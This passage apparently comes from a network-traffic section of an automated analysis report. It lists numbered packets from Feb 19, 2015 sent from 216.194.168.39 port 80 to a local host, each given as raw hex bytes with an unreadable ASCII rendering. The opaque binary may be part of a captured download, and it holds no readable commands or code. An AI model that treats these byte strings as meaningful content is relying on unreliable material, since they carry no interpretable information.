Data Ascii: b4sv)=P;jin:B>%.:8uFOhSr^1?n1}Mx\];V=)5xa4>8faT.F}WGFJ>H!qmk'Zt>S`b5K]BD+K->|O%jk9pRJGl|JD]3.>w`NrQ#8u
98
Feb 19, 2015 13:01:58.967279911 MEZ801032216.194.168.39192.168.1.10Data Raw: cb f8 7b 15 9c ac a7 f9 56 f3 f6 f4 79 96 3e 04 3e 81 eb 27 24 7f 88 ac 25 e1 05 c9 b6 64 69 0d 1e 69 ea 58 cb 60 5e 62 f1 ae bd 2a 3d 1a 55 c8 b4 ba 53 b3 04 ac a2 9b cb 92 bf d6 1e cd ef af 4e 97 00 2c bd ac 87 f1 a8 31 70 08 f5 06 3e 50 d2 f7
Data Ascii: {Vy>>'$%diiX`^b*=USN,1p>Po;RIAJ"N2W<=?_bC0u}>CBSpNYL7<Y^}>LC%JQ6>n~r]?0Y70=V])a#>?>h
99
Feb 19, 2015 13:01:59.030251026 MEZ801032216.194.168.39192.168.1.10Data Raw: 9a b9 9b e0 6c 0f 3e 3c ee 50 f1 0a 5e 56 3b b3 1b b4 da 08 c4 a7 a7 ed b9 ac 4a f3 5c 2f 2a 72 16 d1 3e fb 37 cc d5 05 0b fe d6 aa 79 5d 7c d0 f6 17 79 6a 1f a1 96 28 58 ef b6 b2 dc ac c3 68 f2 fc 2d 8c d3 82 3e e2 21 c5 cb a7 4a 0e 99 b3 7c 48
Data Ascii: l><P^V;J\/*r>7y]|yj(Xh->!J|Hf4K[V!zY75|o>><myg_6:&e>+HW<@g+A=bhdz|.9G>[]w<*K1qf >cg0J1 w|q>.DJI
100
Feb 19, 2015 13:01:59.031028986 MEZ801032216.194.168.39192.168.1.10Data Raw: 42 60 3e 85 67 20 a8 d2 7f 63 d0 16 34 40 34 9e ee 2e ae 45 40 8f dd db 40 6b a1 19 ea 24 df 1b 46 17 20 91 34 91 e7 48 20 77 4e 3d c9 e5 d8 b6 aa ac 70 35 3b 6a 6e 8e 2b ff 3e 82 28 95 11 b8 c6 ca 55 a4 35 d1 d6 38 a5 a4 44 49 24 ad c4 68 5f 35
Data Ascii: B`>g c4@4.E@@k$F 4H wN=p5;jn+>(U58DI$h_5J)A7&( *l$cl1>`^Z"Jr,vk0>8$79^~ lWAQ>PGpZiXr$%:'x>Bl9ESlR; arJrzM>>tEN)l5P
101
Feb 19, 2015 13:01:59.031045914 MEZ801032216.194.168.39192.168.1.10Data Raw: 60 88 3f c0 20 ed 1a f6 61 88 1a 82 05 ad 4a 84 0d d8 3e e5 05 ed 4a a2 60 88 7f 87 60 ed 6b ec dd c6 00 07 21 a4 2b 13 b6 9a 54 4f 36 ac d6 e1 ea 91 7f 7f bd ee 3e 7c 6f 7d d3 06 e4 26 43 90 c5 a9 f0 5e 36 6b cc 1d 21 62 92 a6 e6 1e 67 b8 59 2c
Data Ascii: `? aJ>J``k!+TO6>|o}&C^6k!bgY,lj|!|*gMrdW>w46s$EZ=C+`>.MF|1)!JF1X<sff>S-PK#_%:D>zYL(Pe!)u.?
103
Feb 19, 2015 13:01:59.031210899 MEZ801032216.194.168.39192.168.1.10Data Raw: 02 ed 53 92 22 be 27 b0 a7 c8 65 04 61 ac 8e ad 88 6b 1f b1 e6 4c 3f 28 2b b6 98 ab c2 ce 37 01 22 af a9 03 58 ff 5a 64 c3 ac a0 91 a3 e8 82 d5 67 cb 3e 9d 59 51 d5 ba 02 e4 95 fc a4 ef eb 82 91 ac 93 99 21 e3 3a b6 26 fd a7 a1 3d ff b2 01 c5 18
Data Ascii: S"'eakL?(+7"XZdg>YQ!:&='#fYFO6;`,&$D=iDECn>VcYYF=o =>.(D,lCuW#YZ[t`u>ob&|Dj{Xc>Y@X5NY"*=w#IfBDlYdeAv,$*#
103
Feb 19, 2015 13:01:59.037748098 MEZ801032216.194.168.39192.168.1.10Data Raw: 00 42 72 ac 80 13 a0 e2 d4 3b 9e 29 3e 4c 09 94 fe f0 71 7d 80 0f 16 c0 58 3e 7b c3 3d 18 20 19 3e 5d 32 0d 35 65 9e 5e 57 74 72 09 e8 da 76 ee 0d 0e 23 55 44 e7 55 f4 7f b5 c8 ac fe 95 be a6 56 7a f6 c9 5e 24 5a bb 4f 18 1c a8 07 79 2e ac 0b 7a
Data Ascii: Br;)>Lq}X>{= >]25e^Wtrv#UDUVz^$ZOy.zK{>2oqvp#Bem#oPgm9g>\@Awpy?bQx?I&#Ue90>FZs_YBx>0X(^37=5#=2!T>h^A
105
Feb 19, 2015 13:01:59.037767887 MEZ801032216.194.168.39192.168.1.10Data Raw: 4c 86 3d d1 7e a5 24 51 53 98 b4 97 fd 9a 44 ac 85 bb 43 dd 7f 26 13 10 3e 8f 05 e1 19 96 d8 33 23 d7 c8 ef a9 7b 2b b7 7d e7 94 ac bf 0c f9 6a 69 b2 39 cc 3e 79 03 1c 12 2a 24 b9 be e6 da 58 51 9e c5 92 f8 a1 24 d3 e0 43 38 b4 95 7d d8 8c 5e f4
Data Ascii: L=~$QSDC&>3#{+}ji9>y*$XQ$C8}^F)w5U$C!ZW>^2d$F2/r}%L>^!N.i-$W2Er64>3ZqeEQo_P>ClRw%Rg
106
Feb 19, 2015 13:01:59.037770987 MEZ801032216.194.168.39192.168.1.10Data Raw: 97 d5 85 63 d6 83 61 89 3e 05 34 1a d7 80 3b 3b 08 48 75 96 18 76 87 d4 5f f7 26 e2 4b 20 46 6b 20 4f 22 aa 6f 22 20 c5 38 a4 47 5c 2a 9f 26 0b 2a 90 f1 6c 28 96 92 ac 81 33 75 18 74 d2 fa cd 5e 10 ef d1 16 89 59 af 47 55 f3 ac f9 e5 19 9e f3 24
Data Ascii: ca>4;;Huv_&K Fk O"o" 8G\*&*l(3ut^YGU$>Mn'k[)N]&Mrin(ec:4=Lie\>`xbisJ~&qkSE<e>;L`qw>"k8]wp*&LWq`\72'
107
Feb 19, 2015 13:01:59.038433075 MEZ801032216.194.168.39192.168.1.10Data Raw: e3 af 3e 0d 66 52 2a 98 fd 42 04 d4 87 d6 e1 fa c0 58 6c d1 26 69 e3 6c 36 44 e8 98 15 ac 3f c1 aa 20 c7 2e a4 2a 26 e8 60 a8 d1 d9 0c c9 c2 cf 5a ac 5b 43 64 89 df 47 41 6a 3e a4 67 1f 2c 57 b4 9d 69 e2 7a 7f 23 9e 64 eb 59 04 26 d5 86 e2 57 ce
Data Ascii: >fR*BXl&il6D? .*&`Z[CdGAj>g,Wiz#dY&W=H~#A'>cC_FD8YnF[yk&`Z\y>s9G;0Dh.%:"`$:J(a'xEQ>k^7ODXG5>phBau5\
109
Feb 19, 2015 13:01:59.038450003 MEZ801032216.194.168.39192.168.1.10Data Raw: f0 fc 3e 97 c9 cb 1f 83 ca 9f a5 41 dc 8b 2f 01 c9 2b 4c 0e 28 c5 96 90 29 8d 7e d5 24 ac ca 96 4b 0a 3e ef 3b e6 3e 99 79 96 93 9a 29 2e 03 4a 4f a3 6f 30 85 d7 b4 24 08 80 a3 28 a1 09 65 45 91 fb 3e 0a 4f 1c b6 a4 8f ed 4c 51 51 ef 9e 0a 81 73
Data Ascii: >A/+L()~$K>;>y).JOo0$(eE>OLQQsl(Y"&f!49'>^[ZsvVH~(y%,T.<43UZ3(p2y6y~>n&j;p(VfM>sP~urpK.$">qpzzn
110
Feb 19, 2015 13:01:59.038651943 MEZ801032216.194.168.39192.168.1.10Data Raw: 2d 25 3a 37 32 c9 a4 11 10 ac 7b 43 b1 a2 c1 80 d8 c2 3e e0 43 8b 6f 6b d0 35 20 b2 28 76 2c f4 87 bc 09 d8 29 c3 3f fb fa 88 d9 0e cf ac 78 0f e6 de 25 c7 68 ec 3e b1 d4 34 96 31 72 1d 5e bd 8e e3 3b f5 2c 16 42 ab 05 e0 3e fa 34 8e 27 7b 17 8f
Data Ascii: -%:72{C>Cok5 (v,)?x%h>41r^;,B>4'{Cce)6Bs(R-:N4h>-#_R-s)3KlP<m>4;-mA;,v>FID)Mf..sm=*E=Y}sq^>
111
Feb 19, 2015 13:01:59.042596102 MEZ801032216.194.168.39192.168.1.10Data Raw: bb 51 18 5e 2a fb b5 7e 68 f9 5e f7 8a ad 25 90 92 a2 27 51 1b ab 8b bb ce 3a 46 4a 71 2d 30 0b 2a 08 d0 6a 11 c1 9b db 0c ac ab 92 1f af 44 d2 49 e3 3c 77 b1 b2 bd 54 b1 8c e2 54 2a 61 6f 59 1d dc 1d 8b 01 ac b0 83 6b 6a 15 9e 41 f9 3e c3 6e f5
Data Ascii: Q^*~h^%'Q:FJq-0*jDI<wTT*aoYkjA>nPX/'x*iq^|>n"c<g+,WM bn>2=G_!Ip*z}Dl"x@>znQ<q%v(`;1 :>@Hx~;D6 %J">-q
112
Feb 19, 2015 13:01:59.067202091 MEZ801032216.194.168.39192.168.1.10Data Raw: 59 00 2b 56 da 81 c4 3d 62 b5 6f ac 88 a2 7e ee 0e 47 1f 15 be df cd 29 cc e3 d2 8b e5 2b 2b ef 9c 32 fd f4 25 3a 45 ac 75 24 86 50 ec 41 43 4d 3e 7f e9 e1 5e d6 39 b6 19 40 65 7c 42 dc 73 d0 e5 de 2b 91 f4 a0 6a cc 4b 03 1c ac d4 55 06 9a a6 6a
Data Ascii: Y+V=bo~G)++2%:Eu$PACM>^9@e|Bs+jKUj_6x%B@@r+~WwT%xBcR/>`m"P>M7+pD+?,|J64WW5+k2zlK>CR`/I+<KG$'$R4-ogHF#fn++Fk&9Fh-:p>
113
Feb 19, 2015 13:01:59.067224979 MEZ801032216.194.168.39192.168.1.10Data Raw: 28 fc 8e dc 7d a0 f0 b1 a4 ec 72 c9 74 6a 2c 0d d8 7e e3 4c af 50 31 ac 98 30 fc 1c df 55 6c d1 3e 7b 3e 49 45 47 6e dd 20 aa 63 aa 77 ac 3b 25 7d 36 9c 9d 3e c7 12 9a 66 3b 60 a2 4e ae ac 43 b7 61 e5 8a 0a a0 2c 5e e6 14 0d 0e 0c 8f 7f ac 7a 5d
Data Ascii: (}rtj,~LP10Ul>{>IEGn cw;%}6>f;`NCa,^z]>KIa8y"$)5;&~hH:,OZLIE<>d+]EU.n{A,l?],bs[a# >z9ok,gk{ES{>r
115
Feb 19, 2015 13:01:59.067426920 MEZ801032216.194.168.39192.168.1.10Data Raw: d6 bb e6 65 3e 72 93 ce a4 03 22 50 da 0f cd 91 8e 2e 7a ee 21 2c 2e 57 8c 55 a2 8d 85 45 2d ac 24 62 4c d2 47 54 df ed 3e e9 56 7c 72 e9 c1 ff 33 10 97 ba 11 45 15 e4 30 21 6d ac e1 23 1b b9 ec 7f 18 48 3e eb 85 91 37 0c 64 ed 14 1f 2d 4c fd 81
Data Ascii: e>r"P.z!,.WUE-$bLGT>V|r3E0!m#H>7d-LGu..<oP~0>#o[o(&r=E.30;8,$r,0$/G{.E&iQk-7/>v):8!$.YGfe.Q4yu?`j.&-"k1'x*<>u'*
116
Feb 19, 2015 13:01:59.137345076 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e d9 12 3a 4f e0 e0 cd 03 d4 24 48 8a 29 41 e5 72 cf 2e 93 33 06 ca 49 e1 b8 6e ac a3 73 72 8f 64 c6 6b e1 be ce c2 0f 9c a2 0c 75 65 d4 2e b0 d3 77 46 cf 2a b6 db ac 91 1b b9 9a 71 f1 59 6b 3e 4a ab 90 bd e1 ba a2 76 ec e6 fc 91 39 65 8e 44 f5
Data Ascii: >:O$H)Ar.3Insrdkue.wF*qYk>Jv9eDm>fw>~W(*im.xPl.cTP?!>&siR}aS.DD_~CjoFw*;xED>E?rLB2v#},5=^KN`"/
116
Feb 19, 2015 13:01:59.140702963 MEZ801032216.194.168.39192.168.1.10Data Raw: bd e7 56 ec 7d 43 3e 03 73 24 25 d8 9a 74 6c 52 ff 7f 7d fe 6e 63 14 c5 2f 9b 15 39 74 04 c4 56 a2 ac aa d3 86 03 57 c2 f3 05 fe c7 78 60 9b 1b 3c 93 38 e1 22 ac 7c 25 ec 68 bf e0 07 26 3e e8 eb e9 a8 82 44 88 7e 60 c6 4a a9 4f dd e5 fc 23 2f 38
Data Ascii: V}C>s$%tlR}nc/9tVWx`<8"|%h&>D~`JO#/8+VAoE>_WZqr6/u*;YA>+n2*e?9/>^~+>a z1wO,;$_p|h27;T/sIVSh>J{z=P_i/@2"
118
Feb 19, 2015 13:01:59.140717030 MEZ801032216.194.168.39192.168.1.10Data Raw: d9 94 2f bf 31 ac b2 e9 e9 20 7a 6b ce 98 3c 2e b0 a2 6d 91 bc e0 ef 91 30 45 d3 5b cf 52 bc 06 21 88 57 25 b0 b9 57 18 30 ae d7 03 11 2e 36 ce f6 e8 c3 49 1a 0c 27 c8 b0 a5 b4 fb bb ab 03 e8 44 ac 29 47 74 61 79 46 37 29 36 0f 45 a9 be c9 c4 2d
Data Ascii: /1 zk<.m0E[R!W%W0.6I'D)GtayF7)6E-02G9-14W4m=DtaR*0>d;,:5to[U8R*o4p7Fltm1&?`tM>DAo'fTE-=0[P1aj&a82?E=IE>
119
Feb 19, 2015 13:01:59.140959024 MEZ801032216.194.168.39192.168.1.10Data Raw: 60 b3 94 5c 24 ac 20 7f 7b be 5f 0b 10 40 3f 49 46 ef a9 01 76 5e 3d 1c 22 76 85 95 2e f9 04 72 70 60 3e 1c de 4a c1 5d f3 b3 8e 3b 7f f7 ce f1 08 e1 77 93 0f a4 88 8a d4 f9 04 b1 54 53 50 30 a6 e5 04 cf 0b 62 ba 69 a6 ac b7 c9 64 c8 88 56 72 91
Data Ascii: `\$ {_@?IFv^="v.rp`>J];wTSP0bidVr6,&[92 :j{.hx^Wgp#(>x:F7mm~hqPKKB{>d"|\8":ifrg&H*Z|+87).g+2l\g,gj$rut0j
120
Feb 19, 2015 13:01:59.142179966 MEZ801032216.194.168.39192.168.1.10Data Raw: 6c fc a0 8e a9 19 05 1e c4 8c a6 df c3 d1 e6 65 09 5e 89 a1 df 04 07 e9 e6 05 48 e0 30 9e f8 9f cf e6 23 2d 98 96 bc e3 74 97 e0 93 39 ec 01 5e 08 ac 25 b3 0f b5 7a 5b 17 b8 36 1b 7a 4e eb 96 7b 74 99 52 32 e4 23 a7 72 27 ed 5c a2 ad cb 8a e7 34
Data Ascii: le^H0#-t9^%z[6zN{tR2#r'\4mHb$cJQR_6-p" .;w:^r>#ULgff/T sA{4"0^A.z).*G{cz'>BqjUk6BpAks
121
Feb 19, 2015 13:01:59.142195940 MEZ801032216.194.168.39192.168.1.10Data Raw: b4 b8 bf 97 75 2d 23 a8 1f a4 03 c8 6c af 09 4c 77 ab 7e 36 4c f7 6b 8f 23 ac 1f 90 35 58 72 11 68 72 6e fd 6c 87 1c 7c 2c c5 f3 c9 34 75 3e 1f 74 ef 7e 96 45 8f 73 11 d6 40 5b 18 7a ae 3f 19 df ed 7f 16 9d d3 32 1b d9 1f 62 97 3b 06 09 d7 3c ad
Data Ascii: u-#lLw~6Lk#5Xrhrnl|,4u>t~Es@[z?2b;<5}V!\M >%5lb5fhs@"l=gw$ak"5.CZX*>l4U\ktp4)~5[Y5,;74Ln>;z=fr836mLr;">>5end^67>
123
Feb 19, 2015 13:01:59.142199039 MEZ801032216.194.168.39192.168.1.10Data Raw: 70 bc de 8c 22 f8 ee 9a 37 fb 48 42 88 01 73 e2 dd fb 36 9b 6e cd 98 47 4a bb 57 16 15 bc 38 7a 76 0d 88 44 29 91 3e 35 27 b5 d3 38 af 15 d6 83 40 97 e6 7a 7e 3b 2a f7 2b aa 3a e5 57 ef 05 c2 91 ca f4 47 b5 1e cc 7f e9 c7 d6 ca a5 90 3f de 0e 3a
Data Ascii: p"7HBs6nGJW8zvD)>5'8@z~;*+:WG?:}74;S<%#k#[S>UY4rDI^t~(zMk=vPBY;sQaH6~=mwQ:\QC1z}9>2\:xoC0|}:V[<
123
Feb 19, 2015 13:01:59.144345999 MEZ801032216.194.168.39192.168.1.10Data Raw: 5a d7 70 67 f4 17 87 a8 90 cd 00 97 36 45 c2 b3 da e7 e1 d5 01 11 63 97 8f d9 b2 a4 1e 2b de a9 05 80 7c ed 66 fc 70 4c 0d b5 d1 e4 7f be 37 ec 99 8a 77 34 7e c0 f8 ad 3c 2c 90 96 bc fa 63 e6 33 4e 3a d7 ef 95 b3 de 04 4b 32 24 2a 06 78 2b 6a 7e
Data Ascii: Zpg6Ec+|fpL7w4~<,c3N:K2$*x+j~z4[3@0.t.IcG>sZY:;(6cu,NV*d{5",fqiSB^4%j1:#]=f6,5dv[ftJnurh4r6yg;@}h-`~Pvc4
125
Feb 19, 2015 13:01:59.144361973 MEZ801032216.194.168.39192.168.1.10Data Raw: 7f 61 77 ac 7d 21 db ef 7f de 04 41 48 22 77 ed 7d 24 81 ad 7f 84 4c e6 54 d9 77 33 7f 27 76 ad 7f 2b 76 ed d9 a6 0d 3c 23 3f 77 98 7b 26 ea 5e 2f 19 4a ed 7f 6c 36 ef 3f 2e 36 05 e6 7e a0 51 2f 66 47 7c b1 5a 8f ed e6 72 76 ad 3f 30 36 ed 7e 35
Data Ascii: aw}!AH"w}$LTw3'v+v<#?w{&^/Jl6?.6~Q/fG|Zrv?06~5bn Qa;6}8ww}=v|w+*W~v:Wvt~v}vhvTv~}x+kX\`>6b~vtWsd}7#vqrt6wm#-v~t
126
Feb 19, 2015 13:01:59.144542933 MEZ801032216.194.168.39192.168.1.10Data Raw: a1 e7 9b e2 4e b1 7e b4 9a e4 9c 4d af 98 77 36 6b 2c 29 9d 7d d7 9e 4a 00 52 8b ca f1 2f d0 4e 76 99 e5 ef 7a 72 7e 8a a9 82 aa 57 dd d1 27 4c 7b fc 86 65 6f b5 5c 93 34 9e 76 c1 0d b2 7a b3 16 98 df 25 7f 44 24 fb 42 9f ac cf 7f 93 6e fb be 1d
Data Ascii: N~Mw6k,)}JR/Nvzr~W'L{eo\4vz%D$Bn'u~eh~$}(t2^`v~~~}D$i{{/.+d}~HtP~#Wcg{+rB~Lw4y5mDEw|tzO~3~v[3{Yzr1I{Ns&AS
127
Feb 19, 2015 13:01:59.151237965 MEZ801032216.194.168.39192.168.1.10Data Raw: fd e5 1e 8e 98 65 6a 95 12 b2 1c 84 7b 4a 55 20 ee 38 5f 5c e3 51 26 85 f8 65 12 ee 59 6c 7a d3 1b cc 1e 7e 81 55 3b 99 1b d5 0d b1 11 fc a1 84 53 6d 18 bf 25 b0 a9 e7 13 f4 10 03 e8 4d 3a ef dc cb 0d bc 53 0b 59 e5 97 9d 0f 2b 6b 6d 5b 8c 2e cf
Data Ascii: ej{JU 8_\Q&eYlz~U;Sm%M:SY+km[._|:]GRy?[3s'y +wb^}$dG!6@3x7+L~)Rx]#^iew(Av%Yo2*HRq~:{utAhK:`!b[qN}X)l
129
Feb 19, 2015 13:01:59.151258945 MEZ801032216.194.168.39192.168.1.10Data Raw: 3b 6c 2a f8 02 1e 31 9e de ac bd ac 5a 87 36 06 6b 59 3e 51 dd df fc b0 57 8b 30 31 e1 39 1e 89 38 67 a3 e4 3b 92 8d 6a b7 f2 20 02 54 ac 04 96 66 8c 0e 5b f1 4d 3e 9b b3 66 b6 7c be 09 63 3a 5b bb f5 31 46 79 7e d4 3b 97 64 7f 67 9d 34 97 9b ac
Data Ascii: ;l*1Z6kY>QW0198g;j Tf[M>f|c:[1Fy~;dg4Ds>a,arCqMW;[NPGms0>3tL-yaF;H]l>9jEUU;nAR0`0f0WB@>fA^z6;gOra_W>`z7aDX
130
Feb 19, 2015 13:01:59.151262045 MEZ801032216.194.168.39192.168.1.10Data Raw: e3 8d d2 d8 58 13 3e 00 7f 83 11 e2 35 ed 97 9b 1e 79 0a 77 69 e5 10 1a 3c 0f 51 46 9c 39 77 d2 17 ac 6d 19 59 e2 42 28 be 6b 32 85 1a b3 3b ba 39 aa ab e9 ce ac 48 c9 2c 97 bf 52 c3 c6 3e 15 e1 b9 d7 fd 15 c4 21 a9 fa 15 3a 6a 4b fa ba eb 3c 92
Data Ascii: X>5ywi<QF9wmYB(k2;9H,R>!:jK<FU!*j>.j}Ecgl>6cQRn5<A^PgmmG:8kjk>w6T,%R7<9iDf">D=b<Vy8!
131
Feb 19, 2015 13:01:59.231450081 MEZ801032216.194.168.39192.168.1.10Data Raw: ab a5 fb 91 06 55 03 27 16 b8 0c c3 3d f0 74 d4 eb 21 44 44 ff a0 24 a5 92 a8 97 93 9d 62 9d 2c 3d a3 33 1a 0b cd 86 9c de ac d6 fb ce 96 cd dd 16 d2 3e 83 92 99 39 b5 82 6e 8f 87 e5 5c 2a 6f 3e 65 3d b1 a6 ed 3e a2 88 80 ae 76 02 17 40 a4 79 a5
Data Ascii: U'=t!DD$b,=3>9n\*o>e=>v@yjD=l.8[I>~nF?b3*KGK8;@0u==0N~nYU>|7Zd4uy|=@z?|)@>WFD*-#;wO,NC{=5l3
133
Feb 19, 2015 13:01:59.231472015 MEZ801032216.194.168.39192.168.1.10Data Raw: 68 b8 e0 ad 3e 4e 21 68 82 8f a1 b6 46 ac 20 12 c3 cc fc 6c 11 c5 3e cc 24 38 d9 c4 12 f0 5e 05 2d b4 79 fd 2b 5b d8 47 3f 31 ac 48 d5 e9 a4 27 76 ac 43 ac 7a 93 b1 33 ed fc be 7b 86 92 c5 8d 1e f6 c5 05 3f ed 46 73 cd ff 95 2a 58 ac 26 44 85 ed
Data Ascii: h>N!hF l>$8^-y+[G?1H'vCz3{?Fs*X&Dd>.aQ\yDgb7>F1p\?-&kc0y,Qn6T,D?+"!Tk&ud7>0,}}h?.LPn=BC>[]`1E=t/WR8g[>
134
Feb 19, 2015 13:01:59.231475115 MEZ801032216.194.168.39192.168.1.10Data Raw: be c9 7c 81 92 e5 7f eb 40 3f af 61 13 cc 9f ae c1 ac 4d 48 2c e1 75 70 ed c3 0e dd a2 26 a3 7d 46 16 58 b4 39 ac bf 05 15 ee a6 50 44 d5 3e d5 7b 77 32 f3 73 85 8f 78 f7 df ae 0e c3 9b 0b fd 40 48 96 a1 22 32 13 df 12 ac 7a 76 21 f8 20 96 9f b2
Data Ascii: |@?aMH,up&}FX9PD>{w2sx@H"2zv! >6!AA#Q)>Q&wDK` #@1{="#I/Y<>A5C.[pm;E] DJ@IBu.,Y&dePWey}>$LTg-u!%@w(\kN
136
Feb 19, 2015 13:01:59.237160921 MEZ801032216.194.168.39192.168.1.10Data Raw: b8 a1 3e 92 2c b0 75 b9 00 c9 24 ca 80 cf c1 92 fa a4 95 9d 3c ac 23 8e e2 45 df 71 93 aa 3e 68 64 06 fc f2 50 b1 87 e1 38 c7 49 a6 aa 9d 27 62 41 9b 71 c2 e1 0d 9a 60 39 ac 91 07 08 65 81 7d 57 77 3e 86 ab 57 9b 11 6c af 67 ea d0 ef a2 47 01 e1
Data Ascii: >,u$<#Eq>hdP8I'bAq`9e}Ww>WlgG,@5Lu!>v&?PmZfAY0;_>>qO:gs~h:>v"HW33zB|ARKmSV?t*7K9sBKIZ]LM>#"~`-pkA@"
138
Feb 19, 2015 13:01:59.237180948 MEZ801032216.194.168.39192.168.1.10Data Raw: 43 e1 bf f3 e3 d1 e5 d5 23 ac 27 75 8b 62 55 06 2f e8 3e b3 a6 0a e9 9d e3 62 ef 53 dd 4c f0 63 45 c6 6f 90 56 b5 3e 44 0c 5b b6 32 a7 d3 61 50 02 89 bf 7a 9f 0f 3d b5 c3 5c bc ce 57 33 7b 40 cc af 3f dc 40 e9 58 d0 02 ba b2 3b 43 08 cc 23 0c 69
Data Ascii: C#'ubU/>bSLcEoV>D[2aPz=\W3{@?@X;C#iS.@LH{>\v^2X?C+mmQ2&>|s\m0gV{4T[<Gml+?C;I@nd>a5uhm[(Ck~_cE>08<]qf@E8y>
139
Feb 19, 2015 13:01:59.237184048 MEZ801032216.194.168.39192.168.1.10Data Raw: 65 8b 20 7b b5 b6 71 b1 63 37 29 93 06 92 73 d2 e4 ac 42 7e 99 9f 97 c4 dd 29 3e d0 64 30 65 53 39 5f b2 ba 6f af fa 41 92 ff c2 14 44 d3 2f a8 b8 50 7c 85 3e ac 71 46 b6 ed 2d 85 7e e1 3c be 58 1e 80 e4 ab d7 80 a6 44 c5 1e 30 28 e7 cd bf 67 ac
Data Ascii: e {qc7)sB~)>d0eS9_oAD/P|>qF-~<XD0(gm!&>ux/x0{$]}DW{Z<XD]#ruz>(eYY?Cys#M>MRYlN_D+tJ|>}myL7TA=%4
140
Feb 19, 2015 13:01:59.237593889 MEZ801032216.194.168.39192.168.1.10Data Raw: c3 3c 3e 28 e0 46 73 b9 7a b2 34 28 94 39 8b 29 12 6c 5b 5b 45 6e 56 9e 2b 0b 03 3f 04 ac 4d 1d 08 04 f1 b3 bc ab 3e 97 8c 1a 19 5b 5f 79 58 31 a9 85 66 a0 19 99 79 18 47 3f a5 3f bb e4 4c 27 61 9c 3e 75 19 97 17 4b 11 0a d0 38 a1 94 39 e2 63 38
Data Ascii: <>(Fsz4(9)l[[EnV+?M>[_yX1fyG??L'a>uK89c8 E.X}4z^d>l!7POq)`f>;!-L`LHOqD]Ev@~yXiD[J{r=XEh?,N9mBd> WX$LEK[L95>ZUtaY}
141
Feb 19, 2015 13:01:59.237611055 MEZ801032216.194.168.39192.168.1.10Data Raw: c1 2f 53 f4 e4 e2 3e f6 35 6e be 21 66 a2 82 96 de 30 a2 94 06 f0 6c 33 46 9b 08 0e f4 a2 5e a0 6a ac cd 18 96 9c 50 56 a7 9a 3e 87 96 d4 99 5d e1 6c 29 9f dd ac b0 e5 18 82 d2 98 46 53 07 eb 22 d5 d2 48 3b ac 39 94 68 69 99 0e 0f dc 3e aa b2 82
Data Ascii: /S>5n!f0l3F^jPV>]l)FS"H;9hi>I=~FJofB+/wk>(Quw=-FWo:co)>c'S.v_-*>0mT1J%b<>}E\jSZv`[?gPI-|]FCT
143
Feb 19, 2015 13:01:59.237735033 MEZ801032216.194.168.39192.168.1.10Data Raw: 5b ac 88 19 c9 a6 41 4b 40 05 3e 35 1a 96 ec bb 5c e0 7e 04 a6 24 c5 25 31 ce 13 60 48 d0 d3 ae 4c a1 82 23 c6 ac 3a 18 03 14 85 71 04 4a 3e 56 5d 19 fb 8f 6d a0 74 0d 64 cc 27 14 b4 39 7d db 49 b7 29 b2 77 61 55 c3 40 e5 3e 12 54 43 1e b9 4b 7e
Data Ascii: [AK@>5\~$%1`HL#:qJ>V]mtd'9}I)waU@>TCK~jfs_HxDJ$@[>lHyuEo^.#VLB>zB6Njlk$2iN.eH5\VwFNM>s<:6-&B:]7LBh>r<Q4H:>ml%D;>
144
Feb 19, 2015 13:01:59.242947102 MEZ801032216.194.168.39192.168.1.10Data Raw: 32 04 5a 64 ba ff ee fa 16 3b 7c bb 15 ee 08 78 48 6f 0b 68 55 20 95 df 8c a0 2a 01 97 a8 e7 04 41 d6 c3 b0 49 b2 73 4d 16 57 4b bf a5 ac 57 6c 6c 94 91 55 38 80 3e 29 0f d4 97 4b 7e bb be 08 e8 13 8a 43 7a f9 22 57 49 14 f1 83 ec f3 5b 22 b8 b4
Data Ascii: 2Zd;|xHohU *AIsMWKWllU8>)K~Cz"WI["c:MmI*tX>KC$#Jl6?57I5'P95.>Uj$i0C3I'^ge^d>+ :qDy`Ow6}2Cm:IOr
144
Feb 19, 2015 13:01:59.255680084 MEZ801032216.194.168.39192.168.1.10Data Raw: 49 ae 5e 69 42 c7 78 dc 79 ac 7f f2 09 bc 4a c9 b2 a7 3e af 96 a5 64 d8 d6 a5 eb 73 54 ce 5d 01 57 0a 33 88 49 ad 87 68 36 1d cb c5 19 a0 b0 ee 06 20 64 7c 3a 99 0d e5 49 be 4c 03 af f1 64 b1 fc ac d4 c1 9d 94 48 2a af bc 3e 2f 8e 4e 7d 85 73 78
Data Ascii: I^iBxyJ>dsT]W3Ih6 d|:ILdH*>/N}sxyJtI,mGPS/-B>ukg)TEO8fn]3wI:>ng#Ckgiz1H:@>>m3,I9,4q}2fI/{nO>
146
Feb 19, 2015 13:01:59.255701065 MEZ801032216.194.168.39192.168.1.10Data Raw: 50 2c 00 ed d8 4c 59 db b6 c0 17 64 72 06 e8 3e 4a 17 71 f4 e7 68 1a 65 28 2c 8c a9 9e 35 6e 27 9c 37 30 e2 07 6e 6a 68 6f fc ef d5 4a c9 be d9 41 1c d7 95 60 ac 44 43 94 d7 ce dd 58 83 3e 01 aa c8 75 09 bb ee 20 eb c2 2b b6 4d c7 ff 85 e6 4a 74
Data Ascii: P,LYdr>Jqhe(,5n'70njhoJA`DCX>u +MJt0!eml=4-RJ29e[4ZH~kJ@RY"B}o5>&Pph(K5%1|{P$2>NchJKkLcPPNv>#ZhNWwcKvI
147
Feb 19, 2015 13:01:59.255896091 MEZ801032216.194.168.39192.168.1.10Data Raw: cd 86 f6 22 7f ac 69 1d b7 e5 86 f3 2f 74 3e fa 99 69 e9 e3 ae 89 1a 4c a7 c7 19 9f 16 17 4e a3 4c e5 79 fe ba 7b 11 e8 3f ac c7 8c b0 48 84 2c 14 03 3e 41 2c f8 5e 7d 69 cc 1c 35 09 38 d6 b2 97 63 3b 9e 49 3b 3e b2 72 47 3f b7 b1 42 8d 5a 11 20
Data Ascii: "i/t>iLNLy{?H,>A,^}i58c;I;>rG?BZ zL:1W]-/%?^+ossgI0l\>~y^hHiLcC=,h:>x-}P1wEm%z>;, Pv'5W5yLt{#hc4>0>/LI}
148
Feb 19, 2015 13:01:59.267285109 MEZ801032216.194.168.39192.168.1.10Data Raw: 0d 4a ce 02 fe ac 7b f0 25 85 78 a7 6c 1b 3e a6 d7 f1 ba b4 25 bc 9d d1 06 a9 eb ff 10 59 e2 d1 4c 50 5f 74 53 b7 fe 42 be 6c 8f 12 67 5c 2a b2 63 a9 b4 55 4c e0 a9 22 2f e2 15 76 66 ac c8 3a e5 ec 66 3f f1 50 3e 1d 16 0d d7 fb e8 9d e6 df 82 a1
